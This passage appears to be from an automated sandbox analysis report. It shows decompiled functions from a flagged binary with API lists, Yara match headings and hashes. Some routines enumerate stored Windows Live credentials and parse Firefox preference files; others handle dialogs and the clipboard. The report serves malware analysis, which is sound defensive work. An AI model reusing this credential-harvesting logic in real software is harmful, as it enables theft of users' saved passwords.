                                                                                              				_v796 = 0;
                                                                                              				if(E00404647( &_v800, _t85, _t97) == 0) {
                                                                                              					L21:
                                                                                              					return E004046C2( &_v800);
                                                                                              				}
                                                                                              				_v808 = 0;
                                                                                              				_v812 = 0;
                                                                                              				if(_v780 == 0) {
                                                                                              					_t57 = 0;
                                                                                              					__eflags = 0;
                                                                                              				} else {
                                                                                              					_t57 = _v776(_t89, 0,  &_v812,  &_v808);
                                                                                              				}
                                                                                              				if(_t57 == 0) {
                                                                                              					goto L21;
                                                                                              				} else {
                                                                                              					_t58 = 0;
                                                                                              					_v804 = 0;
                                                                                              					if(_v812 <= 0) {
                                                                                              						L20:
                                                                                              						_v788(_v808);
                                                                                              						goto L21;
                                                                                              					} else {
                                                                                              						do {
                                                                                              							_t92 =  *((intOrPtr*)(_v808 + _t58 * 4));
                                                                                              							if( *((intOrPtr*)(_t92 + 4)) == 1 &&  *(_t92 + 8) != 0 &&  *(_t92 + 0x30) != 0) {
                                                                                              								_v772 = 0;
                                                                                              								memset( &_v771, 0, 0xff);
                                                                                              								_t96 = _t96 + 0xc;
                                                                                              								if(WideCharToMultiByte(0, 0,  *(_t92 + 8), 0xffffffff,  &_v772, 0xff, 0, 0) > 0) {
                                                                                              									_push(0x11);
                                                                                              									_t65 =  &_v772;
                                                                                              									_push("windowslive:name=");
                                                                                              									_push(_t65);
                                                                                              									L00411612();
                                                                                              									_t96 = _t96 + 0xc;
                                                                                              									if(_t65 == 0) {
                                                                                              										_v516 = 0;
                                                                                              										_v260 = 0;
                                                                                              										WideCharToMultiByte(0, 0,  *(_t92 + 0x30), 0xffffffff,  &_v516, 0xff, 0, 0);
                                                                                              										_t68 =  *(_t92 + 0x18);
                                                                                              										if(_t68 > 0) {
                                                                                              											WideCharToMultiByte(0, 0,  *(_t92 + 0x1c), _t68 >> 1,  &_v260, 0xff, 0, 0);
                                                                                              											 *((char*)(_t96 + ( *(_t92 + 0x18) >> 1) + 0x238)) = 0;
                                                                                              										}
                                                                                              										if(_v260 == 0) {
                                                                                              											_t69 = _a4;
                                                                                              											_t44 = _t69 + 8;
                                                                                              											 *_t44 =  *((intOrPtr*)(_t69 + 8)) + 1;
                                                                                              											__eflags =  *_t44;
                                                                                              										} else {
                                                                                              											_t93 = _a4;
                                                                                              											 *((intOrPtr*)( *_t93 + 4))( &_v516);
                                                                                              											 *((intOrPtr*)(_t93 + 4)) =  *((intOrPtr*)(_t93 + 4)) + 1;
                                                                                              										}
                                                                                              									}
                                                                                              								}
                                                                                              							}
                                                                                              							_t58 = _v804 + 1;
                                                                                              							_v804 = _t58;
                                                                                              						} while (_t58 < _v812);
                                                                                              						goto L20;
                                                                                              					}
                                                                                              				}
                                                                                              			}

                                                                                              APIs
                                                                                                • Part of subcall function 00406278: GetVersionExA.KERNEL32(00417118,0000001A,0040EE77,00000104), ref: 00406292
                                                                                              • memset.MSVCRT ref: 0040D917
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?), ref: 0040D92E
                                                                                              • _strnicmp.MSVCRT ref: 0040D948
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040D974
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040D994
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide$Version_strnicmpmemset
                                                                                              • String ID: WindowsLive:name=*$windowslive:name=
                                                                                              • API String ID: 945165440-3589380929
                                                                                              • Opcode ID: 3f9da4edc47d2955fd47475458a514ae76322f65be24e3d720485981fdfd18bc
                                                                                              • Instruction ID: 27d6d704735a973bd95cec350459a8e2137e61d4893fa240fc9d50cc053063f8
                                                                                              • Opcode Fuzzy Hash: 3f9da4edc47d2955fd47475458a514ae76322f65be24e3d720485981fdfd18bc
                                                                                              • Instruction Fuzzy Hash: FD4183B1904345AFC720EF54D9849ABBBECEB84344F044A3EF995A3291D734DD48CB66
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 78%
                                                                                              			E00407FEB(void* __ecx, void* __eflags, struct HWND__* _a4) {
                                                                                              				void _v259;
                                                                                              				char _v260;
                                                                                              				void _v4359;
                                                                                              				char _v4360;
                                                                                              				int _t17;
                                                                                              				CHAR* _t26;
                                                                                              
                                                                                              				E004118A0(0x1104, __ecx);
                                                                                              				_v4360 = 0;
                                                                                              				memset( &_v4359, 0, 0x1000);
                                                                                              				_t17 = GetDlgCtrlID(_a4);
                                                                                              				_t35 = _t17;
                                                                                              				GetWindowTextA(_a4,  &_v4360, 0x1000);
                                                                                              				if(_t17 > 0 && _v4360 != 0) {
                                                                                              					_v260 = 0;
                                                                                              					memset( &_v259, 0, 0xff);
                                                                                              					GetClassNameA(_a4,  &_v260, 0xff);
                                                                                              					_t26 =  &_v260;
                                                                                              					_push("sysdatetimepick32");
                                                                                              					_push(_t26);
                                                                                              					L004115B2();
                                                                                              					if(_t26 != 0) {
                                                                                              						E00407EC3(_t35,  &_v4360);
                                                                                              					}
                                                                                              				}
                                                                                              				return 1;
                                                                                              			}

                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 00408011
                                                                                              • GetDlgCtrlID.USER32 ref: 0040801C
                                                                                              • GetWindowTextA.USER32 ref: 0040802F
                                                                                              • memset.MSVCRT ref: 00408055
                                                                                              • GetClassNameA.USER32(?,?,000000FF), ref: 00408068
                                                                                              • _stricmp.MSVCRT(?,sysdatetimepick32), ref: 0040807A
                                                                                                • Part of subcall function 00407EC3: _itoa.MSVCRT ref: 00407EE4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: memset$ClassCtrlNameTextWindow_itoa_stricmp
                                                                                              • String ID: sysdatetimepick32
                                                                                              • API String ID: 896699463-4169760276
                                                                                              • Opcode ID: 2e87e3ae20d77166e7272aa9ea6a9449553f890dc716fe518baf187b76836374
                                                                                              • Instruction ID: 1a4d9fd07e56cfca2567f2ea4562d04845e15f14fd3b0b17285a92413f4c7fe9
                                                                                              • Opcode Fuzzy Hash: 2e87e3ae20d77166e7272aa9ea6a9449553f890dc716fe518baf187b76836374
                                                                                              • Instruction Fuzzy Hash: 8811E3728040187EDB119B64DC81DEB7BACEF58355F0440BBFB49E2151EA789FC88B69
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 98%
                                                                                              			E00405715(signed int __ecx, intOrPtr _a4, unsigned int _a8, intOrPtr* _a12) {
                                                                                              				signed int _v8;
                                                                                              				intOrPtr _v16;
                                                                                              				void* __esi;
                                                                                              				void* _t74;
                                                                                              				void* _t75;
                                                                                              				signed int _t76;
                                                                                              				signed int _t89;
                                                                                              				signed int _t90;
                                                                                              				void* _t98;
                                                                                              				void* _t101;
                                                                                              				short* _t118;
                                                                                              				unsigned int _t126;
                                                                                              				intOrPtr _t128;
                                                                                              				signed int _t131;
                                                                                              				void* _t144;
                                                                                              				intOrPtr* _t146;
                                                                                              				short _t153;
                                                                                              				signed int _t155;
                                                                                              
                                                                                              				_t129 = __ecx;
                                                                                              				_push(__ecx);
                                                                                              				_t74 = _a4 - 0x4e;
                                                                                              				_t155 = __ecx;
                                                                                              				if(_t74 == 0) {
                                                                                              					_t146 = _a12;
                                                                                              					__eflags =  *((intOrPtr*)(_t146 + 8)) - 0xfffffffd;
                                                                                              					if( *((intOrPtr*)(_t146 + 8)) == 0xfffffffd) {
                                                                                              						__eflags =  *((intOrPtr*)(_t146 + 4)) - 0x3e9;
                                                                                              						if(__eflags == 0) {
                                                                                              							E00404D42(__eflags,  *_t146,  *(_t146 + 0xc));
                                                                                              						}
                                                                                              					}
                                                                                              					__eflags =  *((intOrPtr*)(_t146 + 8)) - 0xffffff9b;
                                                                                              					if( *((intOrPtr*)(_t146 + 8)) != 0xffffff9b) {
                                                                                              						L27:
                                                                                              						_t75 = 0;
                                                                                              						__eflags = 0;
                                                                                              						goto L28;
                                                                                              					} else {
                                                                                              						__eflags =  *((intOrPtr*)(_t146 + 4)) - 0x3e9;
                                                                                              						if( *((intOrPtr*)(_t146 + 4)) != 0x3e9) {
                                                                                              							goto L27;
                                                                                              						}
                                                                                              						_t76 =  *(_t146 + 0x14);
                                                                                              						__eflags = _t76 & 0x00000002;
                                                                                              						if((_t76 & 0x00000002) == 0) {
                                                                                              							L36:
                                                                                              							_t131 =  *(_t146 + 0x18) ^ _t76;
                                                                                              							__eflags = 0x0000f000 & _t131;
                                                                                              							if((0x0000f000 & _t131) == 0) {
                                                                                              								L39:
                                                                                              								__eflags =  *(_t146 + 0x14) & 0x00000002;
                                                                                              								if(( *(_t146 + 0x14) & 0x00000002) == 0) {
                                                                                              									goto L27;
                                                                                              								}
                                                                                              								__eflags =  *(_t146 + 0x18) & 0x00000002;
                                                                                              								if(( *(_t146 + 0x18) & 0x00000002) != 0) {
                                                                                              									goto L27;
                                                                                              								}
                                                                                              								__eflags =  *(_t146 + 0xc);
                                                                                              								E00401469(_t155, 0x3eb, 0 |  *(_t146 + 0xc) != 0x00000000);
                                                                                              								__eflags =  *(_t146 + 0xc) -  *((intOrPtr*)( *((intOrPtr*)(_t155 + 0xc)) + 4)) - 1;
                                                                                              								E00401469(_t155, 0x3ec, 0 |  *(_t146 + 0xc) !=  *((intOrPtr*)( *((intOrPtr*)(_t155 + 0xc)) + 4)) - 0x00000001);
                                                                                              								 *((intOrPtr*)(_t155 + 0x14)) = 1;
                                                                                              								SetDlgItemInt( *(_t155 + 4), 0x3ed,  *( *((intOrPtr*)( *((intOrPtr*)(_t155 + 0xc)))) +  *(_t146 + 0x28) * 4), 0);
                                                                                              								 *((intOrPtr*)(_t155 + 0x14)) = 0;
                                                                                              								_t75 = 1;
                                                                                              								L28:
                                                                                              								return _t75;
                                                                                              							}
                                                                                              							L37:
                                                                                              							_t89 = E004048DC( *_t146,  *(_t146 + 0xc), 0xf002);
                                                                                              							__eflags = _t89 & 0x00000002;
                                                                                              							if((_t89 & 0x00000002) != 0) {
                                                                                              								_t90 = _t89 & 0x0000f000;
                                                                                              								__eflags = _t90 - 0x1000;
                                                                                              								_v8 = _t90;
                                                                                              								E00401469(_t155, 0x3ee, 0 | _t90 == 0x00001000);
                                                                                              								_v16 - 0x2000 = _v16 == 0x2000;
                                                                                              								E00401469(_t155, 0x3ef, 0 | _v16 == 0x00002000);
                                                                                              							}
                                                                                              							goto L39;
                                                                                              						}
                                                                                              						__eflags =  *(_t146 + 0x18) & 0x00000002;
                                                                                              						if(( *(_t146 + 0x18) & 0x00000002) == 0) {
                                                                                              							goto L37;
                                                                                              						}
                                                                                              						goto L36;
                                                                                              					}
                                                                                              				}
                                                                                              				_t98 = _t74 - 0xc2;
                                                                                              				if(_t98 == 0) {
                                                                                              					SendDlgItemMessageA( *(__ecx + 4), 0x3ed, 0xc5, 3, 0);
                                                                                              					E0040559F(_t155);
                                                                                              					goto L27;
                                                                                              				}
                                                                                              				_t101 = _t98 - 1;
                                                                                              				if(_t101 != 0) {
                                                                                              					goto L27;
                                                                                              				}
                                                                                              				_t126 = _a8 >> 0x10;
                                                                                              				if( *((intOrPtr*)(__ecx + 0x14)) != _t101 || _t126 != 0x300) {
                                                                                              					L7:
                                                                                              					if(_t126 != 0) {
                                                                                              						goto L27;
                                                                                              					}
                                                                                              					if(_a8 != 0x3f0) {
                                                                                              						L13:
                                                                                              						if(_a8 == 0x3eb) {
                                                                                              							E00404B35(GetDlgItem( *(_t155 + 4), 0x3e9), _t129);
                                                                                              						}
                                                                                              						if(_a8 == 0x3ec) {
                                                                                              							E00404B78(GetDlgItem( *(_t155 + 4), 0x3e9));
                                                                                              						}
                                                                                              						if(_a8 == 0x3ee) {
                                                                                              							E00404BB4(GetDlgItem( *(_t155 + 4), 0x3e9), 1);
                                                                                              						}
                                                                                              						if(_a8 == 0x3ef) {
                                                                                              							E00404BB4(GetDlgItem( *(_t155 + 4), 0x3e9), 0);
                                                                                              						}
                                                                                              						if(_a8 == 2) {
                                                                                              							EndDialog( *(_t155 + 4), 2);
                                                                                              						}
                                                                                              						if(_a8 == 1) {
                                                                                              							E00405538(_t155);
                                                                                              							EndDialog( *(_t155 + 4), 1);
                                                                                              						}
                                                                                              						_t75 = 1;
                                                                                              						goto L28;
                                                                                              					}
                                                                                              					_t128 =  *((intOrPtr*)( *((intOrPtr*)(_t155 + 0xc)) + 4));
                                                                                              					_t129 = 0;
                                                                                              					if(_t128 <= 0) {
                                                                                              						L12:
                                                                                              						E0040559F(_t155);
                                                                                              						goto L13;
                                                                                              					}
                                                                                              					_t144 = 0;
                                                                                              					do {
                                                                                              						_t118 =  *((intOrPtr*)( *((intOrPtr*)(_t155 + 0xc)))) + _t129 * 4;
                                                                                              						 *(_t118 + 2) = _t129;
                                                                                              						_t153 =  *((intOrPtr*)( *((intOrPtr*)(_t155 + 0x10)) + _t144 + 0xc));
                                                                                              						_t129 = _t129 + 1;
                                                                                              						_t144 = _t144 + 0x14;
                                                                                              						 *_t118 = _t153;
                                                                                              					} while (_t129 < _t128);
                                                                                              					goto L12;
                                                                                              				} else {
                                                                                              					if(_a8 != 0x3ed) {
                                                                                              						goto L27;
                                                                                              					} else {
                                                                                              						E004054C6(__ecx, __ecx);
                                                                                              						goto L7;
                                                                                              					}
                                                                                              				}
                                                                                              			}





















                                                                                              0x00000000
                                                                                              0x00405830
                                                                                              0x00405776
                                                                                              0x00405779
                                                                                              0x0040577d
                                                                                              0x004057a0
                                                                                              0x004057a1
                                                                                              0x00000000
                                                                                              0x004057a1
                                                                                              0x0040577f
                                                                                              0x00405781
                                                                                              0x00405786
                                                                                              0x00405789
                                                                                              0x00405790
                                                                                              0x00405795
                                                                                              0x00405796
                                                                                              0x0040579b
                                                                                              0x0040579b
                                                                                              0x00000000
                                                                                              0x00405751
                                                                                              0x00405757
                                                                                              0x00000000
                                                                                              0x0040575d
                                                                                              0x0040575d
                                                                                              0x00000000
                                                                                              0x0040575d
                                                                                              0x00405757

                                                                                              APIs
                                                                                              • GetDlgItem.USER32 ref: 004057BD
                                                                                              • GetDlgItem.USER32 ref: 004057D0
                                                                                              • GetDlgItem.USER32 ref: 004057E5
                                                                                              • GetDlgItem.USER32 ref: 004057FD
                                                                                              • EndDialog.USER32(?,00000002), ref: 00405819
                                                                                              • EndDialog.USER32(?,00000001), ref: 0040582C
                                                                                                • Part of subcall function 004054C6: GetDlgItem.USER32 ref: 004054D4
                                                                                                • Part of subcall function 004054C6: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 004054E9
                                                                                                • Part of subcall function 004054C6: SendMessageA.USER32 ref: 00405505
                                                                                              • SendDlgItemMessageA.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405844
                                                                                              • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405950
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Item$DialogMessageSend
                                                                                              • String ID:
                                                                                              • API String ID: 2485852401-0
                                                                                              • Opcode ID: c39d939c89ad9df75a692a1ffb268d4e722a9ad13e3cbed9f2235f7ec5d84e36
                                                                                              • Instruction ID: 996ad43d7974a89766dbed28e3aed2d7518275209d6347d70af2c8e68d8db374
                                                                                              • Opcode Fuzzy Hash: c39d939c89ad9df75a692a1ffb268d4e722a9ad13e3cbed9f2235f7ec5d84e36
                                                                                              • Instruction Fuzzy Hash: 8361BE31600A05AFDB21AF25C986A2BB3A5EF40724F04C13EF915A76D1D778A960CF59
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 85%
                                                                                              			E00405960(void** __eax, void* __edi, intOrPtr _a4, struct HWND__* _a8) {
                                                                                              				RECT* _v8;
                                                                                              				void* __esi;
                                                                                              				void* _t39;
                                                                                              				signed int _t41;
                                                                                              				void* _t42;
                                                                                              				struct HWND__* _t47;
                                                                                              				signed int _t53;
                                                                                              				void* _t54;
                                                                                              				signed int _t76;
                                                                                              				signed int _t78;
                                                                                              				void* _t80;
                                                                                              				void** _t82;
                                                                                              				signed int _t86;
                                                                                              				void* _t90;
                                                                                              				signed int _t91;
                                                                                              
                                                                                              				_t80 = __edi;
                                                                                              				_push(_t58);
                                                                                              				_push(0xc);
                                                                                              				_v8 = 0;
                                                                                              				 *((intOrPtr*)(__edi + 0x10)) = __eax;
                                                                                              				L004115D0();
                                                                                              				if(__eax == 0) {
                                                                                              					_t82 = 0;
                                                                                              				} else {
                                                                                              					 *((intOrPtr*)(__eax)) = 0;
                                                                                              					_t82 = __eax;
                                                                                              				}
                                                                                              				 *(_t80 + 0xc) = _t82;
                                                                                              				_t39 =  *_t82;
                                                                                              				_t90 = _t39;
                                                                                              				if(_t90 != 0) {
                                                                                              					_push(_t39);
                                                                                              					L004115D6();
                                                                                              					 *_t82 = 0;
                                                                                              				}
                                                                                              				_t82[2] = _a8;
                                                                                              				_t41 = E004049FB(_a8);
                                                                                              				_t76 = 4;
                                                                                              				_t82[1] = _t41;
                                                                                              				_t42 = _t41 * _t76;
                                                                                              				_push( ~(0 | _t90 > 0x00000000) | _t42);
                                                                                              				L004115D0();
                                                                                              				 *_t82 = _t42;
                                                                                              				memset(_t42, 0, _t82[1] << 2);
                                                                                              				E00408441( *(_t80 + 0xc), ( *(_t80 + 0xc))[2]);
                                                                                              				_t91 =  *(_t80 + 0x10);
                                                                                              				if(_t91 == 0) {
                                                                                              					_t86 = ( *(_t80 + 0xc))[1];
                                                                                              					_t78 = 0x14;
                                                                                              					_t53 = _t86 * _t78;
                                                                                              					_push( ~(0 | _t91 > 0x00000000) | _t53);
                                                                                              					L004115D0();
                                                                                              					 *(_t80 + 0x10) = _t53;
                                                                                              					if(_t86 > 0) {
                                                                                              						_t54 = 0;
                                                                                              						do {
                                                                                              							 *((intOrPtr*)(_t54 +  *(_t80 + 0x10) + 0xc)) = 0x78;
                                                                                              							_t54 = _t54 + 0x14;
                                                                                              							_t86 = _t86 - 1;
                                                                                              						} while (_t86 != 0);
                                                                                              					}
                                                                                              					_v8 = 1;
                                                                                              				}
                                                                                              				if(E00401540(0x448, _t80, _a4) == 1) {
                                                                                              					E004083B1( *(_t80 + 0xc), ( *(_t80 + 0xc))[2]);
                                                                                              					InvalidateRect(( *(_t80 + 0xc))[2], 0, 0);
                                                                                              				}
                                                                                              				_t47 = SetFocus(_a8);
                                                                                              				if(_v8 != 0) {
                                                                                              					_push( *(_t80 + 0x10));
                                                                                              					L004115D6();
                                                                                              				}
                                                                                              				return _t47;
                                                                                              			}


                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                                                              • String ID:
                                                                                              • API String ID: 2313361498-0
                                                                                              • Opcode ID: e9f0ab907bec5e8f57c7acbac99c3809d1984f2ed9ff4bf297ffd43cd07246d7
                                                                                              • Instruction ID: c71b172428599a8aed3dd41af9edf36fe528ac6939486576e3287dd5c50b91d7
                                                                                              • Opcode Fuzzy Hash: e9f0ab907bec5e8f57c7acbac99c3809d1984f2ed9ff4bf297ffd43cd07246d7
                                                                                              • Instruction Fuzzy Hash: 9931C6B2600605BFDB149F29D88591AF7A5FF44354B10863FF54AE72A0DB78EC408F98
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E0040A698(void* __esi) {
                                                                                              				struct HDWP__* _v8;
                                                                                              				int _v12;
                                                                                              				intOrPtr _v16;
                                                                                              				struct tagRECT _v32;
                                                                                              				struct tagRECT _v48;
                                                                                              				void* _t32;
                                                                                              				int _t60;
                                                                                              				int _t65;
                                                                                              
                                                                                              				if( *((intOrPtr*)(__esi + 0x124)) != 0) {
                                                                                              					GetClientRect( *(__esi + 0x108),  &_v32);
                                                                                              					GetWindowRect( *(__esi + 0x114),  &_v48);
                                                                                              					_t65 = _v48.bottom - _v48.top + 1;
                                                                                              					GetWindowRect( *(__esi + 0x118),  &_v48);
                                                                                              					_v12 = _v32.right - _v32.left;
                                                                                              					_t60 = _v48.bottom - _v48.top + 1;
                                                                                              					_v16 = _v32.bottom - _v32.top;
                                                                                              					_v8 = BeginDeferWindowPos(3);
                                                                                              					DeferWindowPos(_v8,  *(__esi + 0x118), 0, 0, 0, _v12, _t60, 4);
                                                                                              					DeferWindowPos(_v8,  *(__esi + 0x114), 0, 0, _v32.bottom - _t65 + 1, _v12, _t65, 6);
                                                                                              					DeferWindowPos(_v8,  *( *((intOrPtr*)(__esi + 0x370)) + 0x184), 0, 0, _t60, _v12, _v16 - _t60 - _t65, 4);
                                                                                              					return EndDeferWindowPos(_v8);
                                                                                              				}
                                                                                              				return _t32;
                                                                                              			}


                                                                                              APIs
                                                                                              • GetClientRect.USER32 ref: 0040A6B7
                                                                                              • GetWindowRect.USER32 ref: 0040A6CD
                                                                                              • GetWindowRect.USER32 ref: 0040A6E0
                                                                                              • BeginDeferWindowPos.USER32 ref: 0040A6FD
                                                                                              • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 0040A71A
                                                                                              • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 0040A73A
                                                                                              • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000004), ref: 0040A761
                                                                                              • EndDeferWindowPos.USER32(?), ref: 0040A76A
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Window$Defer$Rect$BeginClient
                                                                                              • String ID:
                                                                                              • API String ID: 2126104762-0
                                                                                              • Opcode ID: 7346dcf7e22bd518b4d0e96dfafb7fac3e60ecb16f258d456982d784f7109538
                                                                                              • Instruction ID: 87e3885615821b4149b7d1c90d618f2f4546f2004ccbdac015d6c62594ca92fd
                                                                                              • Opcode Fuzzy Hash: 7346dcf7e22bd518b4d0e96dfafb7fac3e60ecb16f258d456982d784f7109538
                                                                                              • Instruction Fuzzy Hash: 1E21A771A00209FFDB11CFA8DE89FEEBBB9FB08710F104465F655E2160C771AA519B24
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 91%
                                                                                              			E00406069(void* _a4) {
                                                                                              				signed int _t11;
                                                                                              				int _t13;
                                                                                              				void* _t17;
                                                                                              				signed int _t19;
                                                                                              				void* _t22;
                                                                                              
                                                                                              				_t22 = _a4;
                                                                                              				_t19 = 0;
                                                                                              				EmptyClipboard();
                                                                                              				if(_t22 != 0) {
                                                                                              					_t2 = strlen(_t22) + 1; // 0x1
                                                                                              					_t13 = _t2;
                                                                                              					_t17 = GlobalAlloc(0x2000, _t13);
                                                                                              					if(_t17 != 0) {
                                                                                              						memcpy(GlobalLock(_t17), _t22, _t13);
                                                                                              						GlobalUnlock(_t17);
                                                                                              						_t11 = SetClipboardData(1, _t17);
                                                                                              						asm("sbb esi, esi");
                                                                                              						_t19 =  ~( ~_t11);
                                                                                              					}
                                                                                              				}
                                                                                              				CloseClipboard();
                                                                                              				return _t19;
                                                                                              			}









                                                                                              APIs
                                                                                              • EmptyClipboard.USER32(?,?,0040AEA7,?), ref: 00406071
                                                                                              • strlen.MSVCRT ref: 0040607E
                                                                                              • GlobalAlloc.KERNEL32(00002000,00000001,?,?,?,?,0040AEA7,?), ref: 0040608D
                                                                                              • GlobalLock.KERNEL32 ref: 0040609A
                                                                                              • memcpy.MSVCRT ref: 004060A3
                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 004060AC
                                                                                              • SetClipboardData.USER32 ref: 004060B5
                                                                                              • CloseClipboard.USER32(?,?,0040AEA7,?), ref: 004060C5
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpystrlen
                                                                                              • String ID:
                                                                                              • API String ID: 3116012682-0
                                                                                              • Opcode ID: e5bd8c8a43ca7d2c4db01fa4e1da57243b9996234b951f9bb1286513fb8d9efd
                                                                                              • Instruction ID: 7816216ade6a299d8ea944e6e9fe2aa84d769726faeb140b6a28ec5125b6acba
                                                                                              • Opcode Fuzzy Hash: e5bd8c8a43ca7d2c4db01fa4e1da57243b9996234b951f9bb1286513fb8d9efd
                                                                                              • Instruction Fuzzy Hash: 0DF0B4375402296BC3102BA0AD4CEDB7B6CEBC8B557028139FB0AD3151EA78592487B9
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 80%
                                                                                              			E0040C530(void* __eflags, intOrPtr* _a4) {
                                                                                              				int _v8;
                                                                                              				char _v12;
                                                                                              				intOrPtr _v16;
                                                                                              				void _v1029;
                                                                                              				void _v1039;
                                                                                              				char _v1040;
                                                                                              				void _v2063;
                                                                                              				void _v2064;
                                                                                              				void _v3087;
                                                                                              				void _v3088;
                                                                                              				void* __ebx;
                                                                                              				intOrPtr _t53;
                                                                                              				void* _t54;
                                                                                              				void* _t56;
                                                                                              				void* _t59;
                                                                                              				void* _t60;
                                                                                              				void* _t67;
                                                                                              				void* _t68;
                                                                                              				void* _t73;
                                                                                              				void* _t85;
                                                                                              				int _t86;
                                                                                              				void* _t106;
                                                                                              				int _t107;
                                                                                              				int _t111;
                                                                                              				void* _t114;
                                                                                              				void* _t115;
                                                                                              				void* _t116;
                                                                                              
                                                                                              				_v1040 = 0;
                                                                                              				memset( &_v1039, 0, 0x3ff);
                                                                                              				_v3088 = 0;
                                                                                              				memset( &_v3087, 0, 0x3ff);
                                                                                              				_v2064 = 0;
                                                                                              				memset( &_v2063, 0, 0x3ff);
                                                                                              				_t116 = _t115 + 0x24;
                                                                                              				_t53 = E00406B74(_a4 + 4);
                                                                                              				_v12 = 0;
                                                                                              				_v16 = _t53;
                                                                                              				_t54 = E00406900(_t53,  &_v1040,  &_v1040,  &_v12);
                                                                                              				if(_t54 != 0) {
                                                                                              					do {
                                                                                              						_t56 = E004069D2(0, "user_pref(\"");
                                                                                              						_pop(_t92);
                                                                                              						if(_t56 != 0) {
                                                                                              							goto L10;
                                                                                              						}
                                                                                              						_push(0x412b10);
                                                                                              						_t60 = 0xb;
                                                                                              						_t14 = E004069D2(_t60) - 0xb; // -11
                                                                                              						_t92 = _t14;
                                                                                              						_v8 = _t92;
                                                                                              						if(_t92 <= 0) {
                                                                                              							goto L10;
                                                                                              						}
                                                                                              						_t85 = E004069D2(_t61 + 1, 0x412b18);
                                                                                              						_t17 = _t85 + 1; // 0x1
                                                                                              						_t106 = E004069D2(_t17, 0x412b10);
                                                                                              						if(_t106 <= 0) {
                                                                                              							_t28 = _t85 + 1; // 0x1
                                                                                              							_t67 = E004069D2(_t28, ")");
                                                                                              							_pop(_t92);
                                                                                              							_t68 = 0xfffffffe;
                                                                                              							_t111 = _t67 + _t68 - _t85;
                                                                                              							if(_t111 <= 0) {
                                                                                              								goto L10;
                                                                                              							}
                                                                                              							_t107 = _v8;
                                                                                              							memcpy( &_v3088,  &_v1029, _t107);
                                                                                              							 *((char*)(_t114 + _t107 - 0xc0c)) = 0;
                                                                                              							_t73 = _t114 + _t85 - 0x40a;
                                                                                              							L9:
                                                                                              							memcpy( &_v2064, _t73, _t111);
                                                                                              							_t92 = _a4;
                                                                                              							_t116 = _t116 + 0x18;
                                                                                              							 *((char*)(_t114 + _t111 - 0x80c)) = 0;
                                                                                              							_t59 =  *((intOrPtr*)( *_a4))( &_v3088,  &_v2064);
                                                                                              							if(_t59 == 0) {
                                                                                              								break;
                                                                                              							}
                                                                                              							goto L10;
                                                                                              						}
                                                                                              						_t20 = _t106 + 1; // 0x1
                                                                                              						_t111 = E004069D2(_t20, 0x412b10) - _t106 - 1;
                                                                                              						_pop(_t92);
                                                                                              						if(_t111 <= 0) {
                                                                                              							goto L10;
                                                                                              						}
                                                                                              						_t86 = _v8;
                                                                                              						memcpy( &_v3088,  &_v1029, _t86);
                                                                                              						 *((char*)(_t114 + _t86 - 0xc0c)) = 0;
                                                                                              						_t73 = _t114 + _t106 - 0x40b;
                                                                                              						goto L9;
                                                                                              						L10:
                                                                                              						_t59 = E00406900(_v16, _t92,  &_v1040,  &_v12);
                                                                                              					} while (_t59 != 0);
                                                                                              					return _t59;
                                                                                              				}
                                                                                              				return _t54;
